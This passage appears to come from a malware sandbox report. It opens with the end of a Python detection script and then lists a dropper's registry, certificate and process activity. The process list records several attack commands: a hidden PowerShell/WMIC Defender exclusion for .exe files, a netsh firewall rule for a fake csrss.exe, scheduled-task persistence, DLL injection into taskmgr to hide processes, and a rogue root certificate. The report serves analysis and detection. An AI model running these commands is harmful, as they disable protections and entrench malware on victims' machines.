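                and basename(image) in STARTUP_LOLBINS:
            findings.append(("lolbin_startup_write", image, target))
        # Named device objects are how user-mode code talks to a driver; drive probes are excluded.
        if kind == "FileOpen" and t.startswith("\\??\\") and not DRIVE_LETTER.match(target) \
                and not SYSTEM_IMAGE_DIRS.match(image):
            findings.append(("device_object_open", image, target))
        # Setting another process's thread context is the core of hollowing/injection.
        if kind == "SetThreadContext" and e.get("pid") != e.get("target_pid"):
            findings.append(("cross_process_thread_context", image, target))
        # Legitimate rule changes arrive via the firewall service (svchost in System32).
        if kind == "RegistryValueSet" and "\\firewallpolicy\\firewallrules\\" in t \
                and not SYSTEM_IMAGE_DIRS.match(image):
            findings.append(("firewall_rule_write", image, target))
    return findings

def by_image(findings):
    """Distinct rules per process image: several unrelated hits on one image is the strong signal."""
    grouped = defaultdict(set)
    for rule, image, _ in findings:
        grouped[image].add(rule)
    return {img: sorted(rules) for img, rules in grouped.items()}
```

A single hit is a lead, not a verdict. Backup and AV agents also open their drivers' device objects, which is why `device_object_open` exempts images under System32/SysWOW64 and why `by_image` is the view to read: XrPxlDIYiTy2ckRQ7B7AEfDZ.exe trips two unrelated rules (local GPO write and firewall rule write), and that combination, rather than either hit alone, is what separates it from an installer. The two benign sample events produce no findings.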
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-162 = "Central Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-571 = "China Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [hex-encoded certificate blob omitted] | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [hex-encoded certificate blob omitted] | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
"C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe"
C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3400 -ip 3400
C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1128
C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"
C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
"C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe"
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --silent --allusers=0
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f17e1d0,0x6f17e1dc,0x6f17e1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe" --version
C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
.\Install.exe /nxdidQZJ "385118" /S
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=724 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140452" --session-guid=70a790ff-7af7-4039-a4c9-a3be2700ab7a --server-tracking-blob="[server-tracking-blob omitted]" --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6e02e1d0,0x6e02e1dc,0x6e02e1e8
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe\" em /OQsite_idAGR 385118 /S" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
